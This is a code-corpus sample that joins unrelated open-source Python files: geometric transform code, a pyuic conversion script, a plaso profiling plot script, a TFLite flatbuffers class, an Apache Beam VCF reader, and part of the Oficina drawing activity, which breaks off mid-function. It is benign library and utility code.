def findConformal(cls, x, y, x_mask=None, y_mask=None, d=None):
"""
Work in progress
Finds conformal transformation (global scaling and rotation folowed by a
translation) that transforms points x to points y:
y = s q x + d
The scale and rotation angle are determined from averages of lengths and
angles respectivly, of vectors formed by x and y in respect to their
centers of mass.
The translation is calculated translation from:
d = y_cm - gl x_cm
where x_cm and y_cm are x and y centers of mass.
If d (translation) is given the transformation is determined using
given d.
Only the points that are not masked neither in x_mask nor in y_mask are
used.
Arguments:
- x, y: sets of points, both having shape (n_points, n_dim)
- x_mask, y_masks: masked (not used) points, vectors of length
n_points
- d: translation vector of length ndim
Returns an instance of the transformation found with following
attributes:
- gl: transformation matrix
- d: translation vector
"""
raise NotImplementedError("Sorry, this is still work in progress.")
# remove masked points
[x, y], mask = cls.removeMasked([x,y], [x_mask,y_mask])
# deal with mode
if d is None:
# bring x and y to cm frame
x_cm = numpy.mean(x, axis=0)
x_0 = x - x_cm
y_cm = numpy.mean(y, axis=0)
y_0 = y - y_cm
else:
x_0 = x
y_0 = y - d
# find scale
x_dist = Points(x_0).distance()
y_dist = Points(y_0).distance()
scale = (y_dist / x_dist).mean()
# find rotation
numpy.arctan2(y_0, x_0)
def decompose(self, gl=None, order=None):
"""
Decomposes gl using QR or singular value decomposition as follows:
gl = q p s m (order 'qr' or 'qpsm')
gl = p s m q (order 'rq' or 'psmq')
gl = u p s v (order 'usv')
where:
- q, u, v: rotation matrix (orthogonal, with det +1)
- p: parity matrix (diagonal, the element self.parity_axis can be +1
or -1, other diagonal elements +1)
- s: scale martix, diagonal and >=0
- m: shear matrix, upper triangular, all diagonal elements 1
The order is determined by agr oder. In this case self.order is set to
(arg) order). Otherwise, if arg order is None, self.order is used.
In case of the singular value decomposition (order='usv'), the angle
corresponding to rotation matrix U is set to be between -pi/2 and pi/2.
This is achieved by rotation of both U and V matrices by pi (if needed).
Note: uses decompose() from super for everything except the adjustment
of U (and V).
Arguments:
- gl: (ndarray) general linear transformation, or self.gl if None
- order: decomposition order 'qpsm' (same as 'qr'), 'psmq' (same as
'rq'), or 'usv'
If arg gl is None, self.gl us used and the matrices resulting from the
decomposition are saved as the arguments of this instance:
- self.q, self.p, self.s and self.m if order 'qpsm', 'qr', 'psmq'
or 'rq'
- self.u, self.p, self.s, self.v if order 'usv'
Returns only if gl is not None:
- (q, p, s, m) if order 'qpsm', 'qr', 'psmq' or 'rq'
- (u, p, s, v) if order 'usv'
"""
# figure out type of return
if gl is None:
new = False
else:
new = True
# decompose
decomp = super(self.__class__, self).decompose(gl=gl, order=order)
if order == 'usv':
# adjust u and v
if decomp is None:
# modify attributes of this instance
self.adjustUV()
else:
# make another instance and modify attributes there
local = self.__class__(order='usv')
(local.u, local.p, local.s, local.v) = decomp
local.adjustUV()
else:
# just return whatever super.decompose() did
return decomp
def adjustUV(self):
"""
In case of the singular value decomposition (order='usv'), the angle
corresponding to rotation matrix U is set to be between -pi/2 and pi/2.
This is achieved by rotation of both U and V matrices by pi (if needed).
If the angle corresponding to the rotation matrix U is already between
-pi/2 and pi/2, doesn't do anything.
"""
if (self.uAngle > numpy.pi / 2) or (self.uAngle < -numpy.pi / 2):
# adjust u
self.uAngle += numpy.pi
# adjust v
self.vAngle += numpy.pi
# compose (should not decompose)
self.gl = self.composeGl(order='usv')
| Splo0sh/3DCT | pyto/affine_2d.py | Python | gpl-3.0 | 24,972 |
#!/usr/bin/env python
import glob
import os
for file in glob.glob("*.ui"):
print "Processing", file
os.system("pyuic -x %s -o ../kuraclient/%s.py" %
(file, os.path.splitext(file)[0]))
| boudewijnrempt/kura | dialogs/convert.py | Python | bsd-2-clause | 209 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Script to plot tasks from profiling data.
This script requires the matplotlib and numpy Python modules.
"""
from __future__ import print_function
from __future__ import unicode_literals
import argparse
import glob
import os
import sys
import numpy # pylint: disable=import-error
from matplotlib import pyplot # pylint: disable=import-error
class TaskMeasurements(object):
"""Measurements of a task.
Attributes:
completed_time (float): time when the task was completed by the foreman.
created_time (float): time when the task was created by the foreman.
merging_duration (float): time it took the foreman to merge the task.
merging_time (float): time when the task was started to be merged by
the foreman.
pending_merge (float): time when the task was scheduled to be merged by
the foreman.
processed_time (float): time when the task was processed according to
the foreman.
processing_duration (float): time it took the worker to process the task.
processing_time (float): time when the task started to be processed by
the worker.
scheduled_time (float): time when the task was scheduled onto the task
queue by the foreman.
"""
def __init__(self):
"""Initializes a task measurement."""
super(TaskMeasurements, self).__init__()
self.completed_time = None
self.created_time = None
self.merging_duration = None
self.merging_time = None
self.pending_merge_time = None
self.processed_time = None
self.processing_duration = None
self.processing_time = None
self.scheduled_time = None
def Main():
"""The main program function.
Returns:
bool: True if successful or False if not.
"""
argument_parser = argparse.ArgumentParser(description=(
'Plots memory usage from profiling data.'))
argument_parser.add_argument(
'--output', dest='output_file', type=str, help=(
'path of the output file to write the graph to instead of using '
'interactive mode. The output format deduced from the extension '
'of the filename.'))
argument_parser.add_argument(
'profile_path', type=str, help=(
'path to the directory containing the profiling data.'))
options = argument_parser.parse_args()
if not os.path.isdir(options.profile_path):
print('No such directory: {0:s}'.format(options.profile_path))
return False
names = ['time', 'identifier', 'status']
measurements = {}
glob_expression = os.path.join(options.profile_path, 'tasks-*.csv.gz')
for csv_file_name in glob.glob(glob_expression):
data = numpy.genfromtxt(
csv_file_name, delimiter='\t', dtype=None, encoding='utf-8',
names=names, skip_header=1)
label = os.path.basename(csv_file_name)
label = label.replace('tasks-', '').replace('.csv.gz', '')
for time, identifier, status in data:
if identifier not in measurements:
measurements[identifier] = TaskMeasurements()
task_measurement = measurements[identifier]
if status == 'completed':
task_measurement.completed_time = time
task_measurement.merging_duration = time - task_measurement.merging_time
elif status == 'created':
task_measurement.created_time = time
# TODO: add support for:
# elif status == 'merge_on_hold':
# elif status == 'merge_resumed':
elif status == 'merge_started':
task_measurement.merging_time = time
elif status == 'pending_merge':
task_measurement.pending_merge_time = time
elif status == 'processed':
task_measurement.processed_time = time
elif status == 'processing_started':
task_measurement.processing_time = time
elif status == 'processing_completed':
task_measurement.processing_duration = (
time - task_measurement.processing_time)
elif status == 'scheduled':
task_measurement.scheduled_time = time
before_pending_merge_duration = {}
before_queued_duration = {}
merging_duration = {}
pending_merge_duration = {}
processing_duration = {}
queued_duration = {}
for identifier, task_measurement in measurements.items():
before_pending_merge_duration[task_measurement.scheduled_time] = (
task_measurement.pending_merge_time - (
task_measurement.processing_time +
task_measurement.processing_duration))
before_queued_duration[task_measurement.scheduled_time] = (
task_measurement.scheduled_time - task_measurement.created_time)
merging_duration[task_measurement.merging_time] = (
task_measurement.merging_duration)
pending_merge_duration[task_measurement.processing_time] = (
task_measurement.merging_time - task_measurement.pending_merge_time)
processing_duration[task_measurement.processing_time] = (
task_measurement.processing_duration)
queued_duration[task_measurement.scheduled_time] = (
task_measurement.processing_time - task_measurement.scheduled_time)
if data.size > 0:
keys = sorted(before_pending_merge_duration.keys())
values = [before_pending_merge_duration[key] for key in keys]
pyplot.plot(keys, values, label='Before pending merge')
keys = sorted(before_queued_duration.keys())
values = [before_queued_duration[key] for key in keys]
pyplot.plot(keys, values, label='Before queued')
keys = sorted(merging_duration.keys())
values = [merging_duration[key] for key in keys]
pyplot.plot(keys, values, label='Merging')
keys = sorted(pending_merge_duration.keys())
values = [pending_merge_duration[key] for key in keys]
pyplot.plot(keys, values, label='Pending merge')
keys = sorted(processing_duration.keys())
values = [processing_duration[key] for key in keys]
pyplot.plot(keys, values, label='Processing')
keys = sorted(queued_duration.keys())
values = [queued_duration[key] for key in keys]
pyplot.plot(keys, values, label='Queued')
pyplot.title('Task status duration')
pyplot.xlabel('Time')
pyplot.xscale('linear')
pyplot.ylabel('Duration')
pyplot.yscale('linear')
pyplot.legend()
if options.output_file:
pyplot.savefig(options.output_file)
else:
pyplot.show()
return True
if __name__ == '__main__':
if not Main():
sys.exit(1)
else:
sys.exit(0)
| rgayon/plaso | utils/plot_tasks.py | Python | apache-2.0 | 6,415 |
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# automatically generated by the FlatBuffers compiler, do not modify
# namespace: tflite
import flatbuffers
from flatbuffers.compat import import_numpy
np = import_numpy()
class TransposeOptions(object):
__slots__ = ['_tab']
@classmethod
def GetRootAsTransposeOptions(cls, buf, offset):
n = flatbuffers.encode.Get(flatbuffers.packer.uoffset, buf, offset)
x = TransposeOptions()
x.Init(buf, n + offset)
return x
@classmethod
def TransposeOptionsBufferHasIdentifier(cls, buf, offset, size_prefixed=False):
return flatbuffers.util.BufferHasIdentifier(buf, offset, b"\x54\x46\x4C\x33", size_prefixed=size_prefixed)
# TransposeOptions
def Init(self, buf, pos):
self._tab = flatbuffers.table.Table(buf, pos)
def TransposeOptionsStart(builder): builder.StartObject(0)
def TransposeOptionsEnd(builder): return builder.EndObject()
class TransposeOptionsT(object):
# TransposeOptionsT
def __init__(self):
pass
@classmethod
def InitFromBuf(cls, buf, pos):
transposeOptions = TransposeOptions()
transposeOptions.Init(buf, pos)
return cls.InitFromObj(transposeOptions)
@classmethod
def InitFromObj(cls, transposeOptions):
x = TransposeOptionsT()
x._UnPack(transposeOptions)
return x
# TransposeOptionsT
def _UnPack(self, transposeOptions):
if transposeOptions is None:
return
# TransposeOptionsT
def Pack(self, builder):
TransposeOptionsStart(builder)
transposeOptions = TransposeOptionsEnd(builder)
return transposeOptions
| google-research/falken | service/generated_flatbuffers/tflite/TransposeOptions.py | Python | apache-2.0 | 2,218 |
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""A source for reading from VCF files (version 4.x).
The 4.2 spec is available at https://samtools.github.io/hts-specs/VCFv4.2.pdf.
"""
from __future__ import absolute_import
import logging
import traceback
from collections import namedtuple
from six import string_types
import vcf
from apache_beam.coders import coders
from apache_beam.io import filebasedsource
from apache_beam.io.filesystem import CompressionTypes
from apache_beam.io.iobase import Read
from apache_beam.io.textio import _TextSource as TextSource
from apache_beam.transforms import PTransform
try:
long # Python 2
except NameError:
long = int # Python 3
__all__ = ['ReadFromVcf', 'Variant', 'VariantCall', 'VariantInfo',
'MalformedVcfRecord']
# Stores data about variant INFO fields. The type of 'data' is specified in the
# VCF headers. 'field_count' is a string that specifies the number of fields
# that the data type contains. Its value can either be a number representing a
# constant number of fields, `None` indicating that the value is not set
# (equivalent to '.' in the VCF file) or one of:
# - 'A': one value per alternate allele.
# - 'G': one value for each possible genotype.
# - 'R': one value for each possible allele (including the reference).
VariantInfo = namedtuple('VariantInfo', ['data', 'field_count'])
# Stores data about failed VCF record reads. `line` is the text line that
# caused the failed read and `file_name` is the name of the file that the read
# failed in.
MalformedVcfRecord = namedtuple('MalformedVcfRecord', ['file_name', 'line'])
MISSING_FIELD_VALUE = '.' # Indicates field is missing in VCF record.
PASS_FILTER = 'PASS' # Indicates that all filters have been passed.
END_INFO_KEY = 'END' # The info key that explicitly specifies end of a record.
GENOTYPE_FORMAT_KEY = 'GT' # The genotype format key in a call.
PHASESET_FORMAT_KEY = 'PS' # The phaseset format key.
DEFAULT_PHASESET_VALUE = '*' # Default phaseset value if call is phased, but
# no 'PS' is present.
MISSING_GENOTYPE_VALUE = -1 # Genotype to use when '.' is used in GT field.
class Variant(object):
"""A class to store info about a genomic variant.
Each object corresponds to a single record in a VCF file.
"""
def __init__(self,
reference_name=None,
start=None,
end=None,
reference_bases=None,
alternate_bases=None,
names=None,
quality=None,
filters=None,
info=None,
calls=None):
"""Initialize the :class:`Variant` object.
Args:
reference_name (str): The reference on which this variant occurs
(such as `chr20` or `X`). .
start (int): The position at which this variant occurs (0-based).
Corresponds to the first base of the string of reference bases.
end (int): The end position (0-based) of this variant. Corresponds to the
first base after the last base in the reference allele.
reference_bases (str): The reference bases for this variant.
alternate_bases (List[str]): The bases that appear instead of the
reference bases.
names (List[str]): Names for the variant, for example a RefSNP ID.
quality (float): Phred-scaled quality score (-10log10 prob(call is wrong))
Higher values imply better quality.
filters (List[str]): A list of filters (normally quality filters) this
variant has failed. `PASS` indicates this variant has passed all
filters.
info (dict): A map of additional variant information. The key is specified
in the VCF record and the value is of type ``VariantInfo``.
calls (list of :class:`VariantCall`): The variant calls for this variant.
Each one represents the determination of genotype with respect to this
variant.
"""
self.reference_name = reference_name
self.start = start
self.end = end
self.reference_bases = reference_bases
self.alternate_bases = alternate_bases or []
self.names = names or []
self.quality = quality
self.filters = filters or []
self.info = info or {}
self.calls = calls or []
def __eq__(self, other):
return (isinstance(other, Variant) and
vars(self) == vars(other))
def __repr__(self):
return ', '.join(
[str(s) for s in [self.reference_name,
self.start,
self.end,
self.reference_bases,
self.alternate_bases,
self.names,
self.quality,
self.filters,
self.info,
self.calls]])
def __lt__(self, other):
if not isinstance(other, Variant):
return NotImplemented
# Elements should first be sorted by reference_name, start, end.
# Ordering of other members is not important, but must be
# deterministic.
if self.reference_name != other.reference_name:
return self.reference_name < other.reference_name
elif self.start != other.start:
return self.start < other.start
elif self.end != other.end:
return self.end < other.end
self_vars = vars(self)
other_vars = vars(other)
for key in sorted(self_vars):
if self_vars[key] != other_vars[key]:
return self_vars[key] < other_vars[key]
return False
def __le__(self, other):
if not isinstance(other, Variant):
return NotImplemented
return self < other or self == other
def __ne__(self, other):
return not self == other
def __gt__(self, other):
if not isinstance(other, Variant):
return NotImplemented
return other < self
def __ge__(self, other):
if not isinstance(other, Variant):
return NotImplemented
return other <= self
class VariantCall(object):
"""A class to store info about a variant call.
A call represents the determination of genotype with respect to a particular
variant. It may include associated information such as quality and phasing.
"""
def __init__(self, name=None, genotype=None, phaseset=None, info=None):
"""Initialize the :class:`VariantCall` object.
Args:
name (str): The name of the call.
genotype (List[int]): The genotype of this variant call as specified by
the VCF schema. The values are either `0` representing the reference,
or a 1-based index into alternate bases. Ordering is only important if
`phaseset` is present. If a genotype is not called (that is, a `.` is
present in the GT string), -1 is used
phaseset (str): If this field is present, this variant call's genotype
ordering implies the phase of the bases and is consistent with any other
variant calls in the same reference sequence which have the same
phaseset value. If the genotype data was phased but no phase set was
specified, this field will be set to `*`.
info (dict): A map of additional variant call information. The key is
specified in the VCF record and the type of the value is specified by
the VCF header FORMAT.
"""
self.name = name
self.genotype = genotype or []
self.phaseset = phaseset
self.info = info or {}
def __eq__(self, other):
return ((self.name, self.genotype, self.phaseset, self.info) ==
(other.name, other.genotype, other.phaseset, other.info))
def __repr__(self):
return ', '.join(
[str(s) for s in [self.name, self.genotype, self.phaseset, self.info]])
class _VcfSource(filebasedsource.FileBasedSource):
"""A source for reading VCF files.
Parses VCF files (version 4) using PyVCF library. If file_pattern specifies
multiple files, then the header from each file is used separately to parse
the content. However, the output will be a uniform PCollection of
:class:`Variant` objects.
"""
DEFAULT_VCF_READ_BUFFER_SIZE = 65536 # 64kB
def __init__(self,
file_pattern,
compression_type=CompressionTypes.AUTO,
buffer_size=DEFAULT_VCF_READ_BUFFER_SIZE,
validate=True,
allow_malformed_records=False):
super(_VcfSource, self).__init__(file_pattern,
compression_type=compression_type,
validate=validate)
self._header_lines_per_file = {}
self._compression_type = compression_type
self._buffer_size = buffer_size
self._allow_malformed_records = allow_malformed_records
def read_records(self, file_name, range_tracker):
record_iterator = _VcfSource._VcfRecordIterator(
file_name,
range_tracker,
self._pattern,
self._compression_type,
self._allow_malformed_records,
buffer_size=self._buffer_size,
skip_header_lines=0)
# Convert iterator to generator to abstract behavior
for line in record_iterator:
yield line
class _VcfRecordIterator(object):
"""An Iterator for processing a single VCF file."""
def __init__(self,
file_name,
range_tracker,
file_pattern,
compression_type,
allow_malformed_records,
**kwargs):
self._header_lines = []
self._last_record = None
self._file_name = file_name
self._allow_malformed_records = allow_malformed_records
text_source = TextSource(
file_pattern,
0, # min_bundle_size
compression_type,
True, # strip_trailing_newlines
coders.StrUtf8Coder(), # coder
validate=False,
header_processor_fns=(lambda x: x.startswith('#'),
self._store_header_lines),
**kwargs)
self._text_lines = text_source.read_records(self._file_name,
range_tracker)
try:
self._vcf_reader = vcf.Reader(fsock=self._create_generator())
except SyntaxError as e:
# Throw the exception inside the generator to ensure file is properly
# closed (it's opened inside TextSource.read_records).
self._text_lines.throw(
ValueError('An exception was raised when reading header from VCF '
'file %s: %s' % (self._file_name,
traceback.format_exc(e))))
def _store_header_lines(self, header_lines):
self._header_lines = header_lines
def _create_generator(self):
header_processed = False
for text_line in self._text_lines:
if not header_processed and self._header_lines:
for header in self._header_lines:
self._last_record = header
yield self._last_record
header_processed = True
# PyVCF has explicit str() calls when parsing INFO fields, which fails
# with UTF-8 decoded strings. Encode the line back to UTF-8.
self._last_record = text_line.encode('utf-8')
yield self._last_record
def __iter__(self):
return self
def next(self):
try:
record = next(self._vcf_reader)
return self._convert_to_variant_record(record, self._vcf_reader.infos,
self._vcf_reader.formats)
except (LookupError, ValueError) as e:
if self._allow_malformed_records:
logging.warning(
'An exception was raised when reading record from VCF file '
'%s. Invalid record was %s: %s',
self._file_name, self._last_record, traceback.format_exc(e))
return MalformedVcfRecord(self._file_name, self._last_record)
# Throw the exception inside the generator to ensure file is properly
# closed (it's opened inside TextSource.read_records).
self._text_lines.throw(
ValueError('An exception was raised when reading record from VCF '
'file %s. Invalid record was %s: %s' % (
self._file_name,
self._last_record,
traceback.format_exc(e))))
def _convert_to_variant_record(self, record, infos, formats):
"""Converts the PyVCF record to a :class:`Variant` object.
Args:
record (:class:`~vcf.model._Record`): An object containing info about a
variant.
infos (dict): The PyVCF dict storing INFO extracted from the VCF header.
The key is the info key and the value is :class:`~vcf.parser._Info`.
formats (dict): The PyVCF dict storing FORMAT extracted from the VCF
header. The key is the FORMAT key and the value is
:class:`~vcf.parser._Format`.
Returns:
A :class:`Variant` object from the given record.
"""
variant = Variant()
variant.reference_name = record.CHROM
variant.start = record.start
variant.end = record.end
variant.reference_bases = (
record.REF if record.REF != MISSING_FIELD_VALUE else None)
# ALT fields are classes in PyVCF (e.g. Substitution), so need convert
# them to their string representations.
variant.alternate_bases.extend(
[str(r) for r in record.ALT if r] if record.ALT else [])
variant.names.extend(record.ID.split(';') if record.ID else [])
variant.quality = record.QUAL
# PyVCF uses None for '.' and an empty list for 'PASS'.
if record.FILTER is not None:
variant.filters.extend(
record.FILTER if record.FILTER else [PASS_FILTER])
for k, v in record.INFO.iteritems():
# Special case: END info value specifies end of the record, so adjust
# variant.end and do not include it as part of variant.info.
if k == END_INFO_KEY:
variant.end = v
continue
field_count = None
if k in infos:
field_count = self._get_field_count_as_string(infos[k].num)
variant.info[k] = VariantInfo(data=v, field_count=field_count)
for sample in record.samples:
call = VariantCall()
call.name = sample.sample
for allele in sample.gt_alleles or [MISSING_GENOTYPE_VALUE]:
if allele is None:
allele = MISSING_GENOTYPE_VALUE
call.genotype.append(int(allele))
phaseset_from_format = (getattr(sample.data, PHASESET_FORMAT_KEY)
if PHASESET_FORMAT_KEY in sample.data._fields
else None)
# Note: Call is considered phased if it contains the 'PS' key regardless
# of whether it uses '|'.
if phaseset_from_format or sample.phased:
call.phaseset = (str(phaseset_from_format) if phaseset_from_format
else DEFAULT_PHASESET_VALUE)
for field in sample.data._fields:
# Genotype and phaseset (if present) are already included.
if field in (GENOTYPE_FORMAT_KEY, PHASESET_FORMAT_KEY):
continue
data = getattr(sample.data, field)
# Convert single values to a list for cases where the number of fields
# is unknown. This is to ensure consistent types across all records.
# Note: this is already done for INFO fields in PyVCF.
if (field in formats and
formats[field].num is None and
isinstance(data, (int, float, long, string_types, bool))):
data = [data]
call.info[field] = data
variant.calls.append(call)
return variant
def _get_field_count_as_string(self, field_count):
"""Returns the string representation of field_count from PyVCF.
PyVCF converts field counts to an integer with some predefined constants
as specified in the vcf.parser.field_counts dict (e.g. 'A' is -1). This
method converts them back to their string representation to avoid having
direct dependency on the arbitrary PyVCF constants.
Args:
field_count (int): An integer representing the number of fields in INFO
as specified by PyVCF.
Returns:
A string representation of field_count (e.g. '-1' becomes 'A').
Raises:
ValueError: if the field_count is not valid.
"""
if field_count is None:
return None
elif field_count >= 0:
return str(field_count)
field_count_to_string = {v: k for k, v in vcf.parser.field_counts.items()}
if field_count in field_count_to_string:
return field_count_to_string[field_count]
else:
raise ValueError('Invalid value for field_count: %d' % field_count)
class ReadFromVcf(PTransform):
"""A :class:`~apache_beam.transforms.ptransform.PTransform` for reading VCF
files.
Parses VCF files (version 4) using PyVCF library. If file_pattern specifies
multiple files, then the header from each file is used separately to parse
the content. However, the output will be a PCollection of
:class:`Variant` (or :class:`MalformedVcfRecord` for failed reads) objects.
"""
def __init__(
self,
file_pattern=None,
compression_type=CompressionTypes.AUTO,
validate=True,
allow_malformed_records=False,
**kwargs):
"""Initialize the :class:`ReadFromVcf` transform.
Args:
file_pattern (str): The file path to read from either as a single file or
a glob pattern.
compression_type (str): Used to handle compressed input files.
Typical value is :attr:`CompressionTypes.AUTO
<apache_beam.io.filesystem.CompressionTypes.AUTO>`, in which case the
underlying file_path's extension will be used to detect the compression.
validate (bool): flag to verify that the files exist during the pipeline
creation time.
allow_malformed_records (bool): determines if failed VCF
record reads will be tolerated. Failed record reads will result in a
:class:`MalformedVcfRecord` being returned from the read of the record
rather than a :class:`Variant`.
"""
super(ReadFromVcf, self).__init__(**kwargs)
self._source = _VcfSource(
file_pattern,
compression_type,
validate=validate,
allow_malformed_records=allow_malformed_records)
def expand(self, pvalue):
return pvalue.pipeline | Read(self._source)
| tgroh/incubator-beam | sdks/python/apache_beam/io/vcfio.py | Python | apache-2.0 | 19,256 |
# -*- coding: utf-8 -*-
"""
@namespace Desenho
Pixmap manipulation
Copyright 2007, NATE-LSI-EPUSP
Oficina is developed in Brazil at Escola Politécnica of
Universidade de São Paulo. NATE is part of LSI (Integrable
Systems Laboratory) and stands for Learning, Work and Entertainment
Research Group. Visit our web page:
www.lsi.usp.br/nate
Suggestions, bugs and doubts, please email oficina@lsi.usp.br
Oficina is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation version 2 of
the License.
Oficina is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public
License along with Oficina; if not, write to the
Free Software Foundation, Inc., 51 Franklin St, Fifth Floor,
Boston, MA 02110-1301 USA.
The copy of the GNU General Public License is found in the
COPYING file included in the source distribution.
Authors:
Joyce Alessandra Saul (joycealess@gmail.com)
Andre Mossinato (andremossinato@gmail.com)
Nathalia Sautchuk Patrício (nathalia.sautchuk@gmail.com)
Pedro Kayatt (pekayatt@gmail.com)
Rafael Barbolo Lopes (barbolo@gmail.com)
Alexandre A. Gonçalves Martinazzo (alexandremartinazzo@gmail.com)
Colaborators:
Bruno Gola (brunogola@gmail.com)
Group Manager:
Irene Karaguilla Ficheman (irene@lsi.usp.br)
Cientific Coordinator:
Roseli de Deus Lopes (roseli@lsi.usp.br)
UI Design (OLPC):
Eben Eliason (eben@laptop.org)
Project Coordinator (OLPC):
Manusheel Gupta (manu@laptop.org)
Project Advisor (OLPC):
Walter Bender (walter@laptop.org)
"""
from gi.repository import Gdk
from gi.repository import Gtk
from gi.repository import GObject
import logging
import math
import cairo
# The time to wait for the resize operation to be
# executed, after the resize controls are pressed.
RESIZE_DELAY = 500
class Desenho:
# Pixmap manipulation
def __init__(self, widget):
"""Initialize Desenho object.
@param self -- Desenho.Desenho instance
@param widget -- Area object (GtkDrawingArea)
"""
self._resize_timer = None
self._rainbow_color_list = ['#ff0000', # red
'#ff8000', # orange
'#ffff00', # yellow
'#80ff00', # lime
'#00ff00', # green
'#00ff80', # green water
'#00ffff', # light blue
'#007fff', # almost blue
'#0000ff', # blue
'#8000ff', # indigo
'#ff00ff', # pink violet
'#ff0080'] # violet
self._rainbow_counter = 0
self.points = []
self.points1 = []
self.points2 = []
self.points3 = []
self.points4 = []
self._last_points_used = []
self._last_point_drawn_index = 0
def clear_control_points(self):
self._last_points_used = []
def line(self, widget, coords, temp):
"""Draw line.
@param self -- Desenho.Desenho instance
@param widget -- Area object (GtkDrawingArea)
@param coords -- Two value tuple
"""
if temp:
ctx = widget.temp_ctx
else:
ctx = widget.drawing_ctx
ctx.save()
ctx.new_path()
ctx.set_line_width(widget.tool['line size'])
ctx.set_line_cap(cairo.LINE_CAP_ROUND)
ctx.set_source_rgba(*widget.tool['cairo_stroke_color'])
ctx.move_to(widget.oldx, widget.oldy)
ctx.line_to(coords[0], coords[1])
ctx.stroke()
ctx.restore()
# TODO: clip
widget.queue_draw()
def eraser(self, widget, coords, last):
"""Erase part of the drawing.
@param self -- Desenho.Desenho instance
@param last -- last of oldx
@param widget -- Area object (GtkDrawingArea)
@param coords -- Two value tuple
@param size -- integer (default 30)
@param shape -- string (default 'circle')
"""
self._trace(widget, coords, last)
def brush(self, widget, coords, last):
"""Paint with brush.
@param self -- Desenho.Desenho instance
@param last -- last of oldx
@param widget -- Area object (GtkDrawingArea)
@param coords -- Two value tuple
@param size -- integer (default 30)
@param shape -- string (default 'circle')
"""
self._trace(widget, coords, last)
def kalidoscope(self, widget, coords, last):
"""Paint with kalidoscope.
@param self -- Desenho.Desenho instance
@param last -- last of oldx
@param widget -- Area object (GtkDrawingArea)
@param coords -- Two value tuple
"""
if not last:
self.points1 = []
self.points2 = []
self.points3 = []
self.points4 = []
shape = widget.tool['line shape']
rounded = (shape == 'circle')
x1, y1 = coords
x3, y2 = x1, y1
width, height = widget.get_size()
x2 = width - x1
x4 = x2
y3 = height - y1
y4 = y3
self.points1.append((x1, y1))
self.points2.append((x2, y2))
self.points3.append((x3, y3))
self.points4.append((x4, y4))
self._draw_polygon(widget, False, False, self.points1, False, rounded)
self._draw_polygon(widget, False, False, self.points2, False, rounded)
self._draw_polygon(widget, False, False, self.points3, False, rounded)
self._draw_polygon(widget, False, False, self.points4, False, rounded)
widget.queue_draw()
def stamp(self, widget, coords, last, stamp_size=20):
"""Paint with stamp.
@param self -- Desenho.Desenho instance
@param last -- last of oldx
@param widget -- Area object (GtkDrawingArea)
@param coords -- Two value tuple
@param stamp_size -- integer (default 20)
"""
widget.desenha = False
width = widget.resized_stamp.get_width()
height = widget.resized_stamp.get_height()
dx = coords[0] - width / 2
dy = coords[1] - height / 2
widget.drawing_ctx.save()
widget.drawing_ctx.translate(dx, dy)
widget.drawing_ctx.rectangle(dx, dy, width, height)
Gdk.cairo_set_source_pixbuf(widget.drawing_ctx, widget.resized_stamp,
0, 0)
widget.drawing_ctx.paint()
widget.drawing_ctx.restore()
widget.queue_draw_area(dx, dy, width, height)
def rainbow(self, widget, coords, last):
"""Paint with rainbow.
@param self -- Desenho.Desenho instance
@param last -- last of oldx
@param widget -- Area object (GtkDrawingArea)
@param color -- select the color adress
@param coords -- Two value tuple
@param size -- integer (default 30)
@param shape -- string (default 'circle')
"""
_color_str = self._rainbow_color_list[self._rainbow_counter]
_color = Gdk.color_parse(_color_str)
self._rainbow_counter += 1
if self._rainbow_counter > 11:
self._rainbow_counter = 0
widget.drawing_ctx.set_source_rgba(_color.red, _color.green,
_color.blue, 0.3)
self._old_trace(widget, coords, last)
def _old_trace(self, widget, coords, last):
"""
_old_trace is used only by rainbow
"""
widget.desenha = False
size = widget.tool['line size']
shape = widget.tool['line shape']
if shape == 'circle':
if last:
widget.drawing_ctx.set_line_width(size)
widget.drawing_ctx.set_line_cap(cairo.LINE_CAP_ROUND)
widget.drawing_ctx.set_line_join(cairo.LINE_JOIN_ROUND)
widget.drawing_ctx.move_to(last[0], last[1])
widget.drawing_ctx.line_to(coords[0], coords[1])
widget.drawing_ctx.stroke()
else:
widget.drawing_ctx.move_to(coords[0], coords[1])
widget.drawing_ctx.arc(coords[0], coords[1],
size / 2, 0., 2 * math.pi)
# when activity starts with rainbow tool, need this to
# not paint the background
widget.drawing_ctx.set_source_rgba(1.0, 1.0, 1.0, 0.0)
widget.drawing_ctx.fill()
elif shape == 'square':
if last:
points = [(last[0] - size / 2, last[1] - size / 2),
(coords[0] - size / 2, coords[1] - size / 2),
(coords[0] + size / 2, coords[1] + size / 2),
(last[0] + size / 2, last[1] + size / 2)]
for point in points:
widget.drawing_ctx.line_to(*point)
widget.drawing_ctx.fill()
points = [(last[0] + size / 2, last[1] - size / 2),
(coords[0] + size / 2, coords[1] - size / 2),
(coords[0] - size / 2, coords[1] + size / 2),
(last[0] - size / 2, last[1] + size / 2)]
for point in points:
widget.drawing_ctx.line_to(*point)
widget.drawing_ctx.fill()
else:
widget.drawing_ctx.move_to(coords[0] - size / 2,
coords[1] - size / 2)
widget.drawing_ctx.rectangle(coords[0] - size / 2,
coords[1] - size / 2, size, size)
# when activity starts with rainbow tool, need this to
# not paint the background
widget.drawing_ctx.set_source_rgba(1.0, 1.0, 1.0, 0.0)
widget.drawing_ctx.fill()
if last:
x = min(coords[0], last[0])
width = max(coords[0], last[0]) - x
y = min(coords[1], last[1])
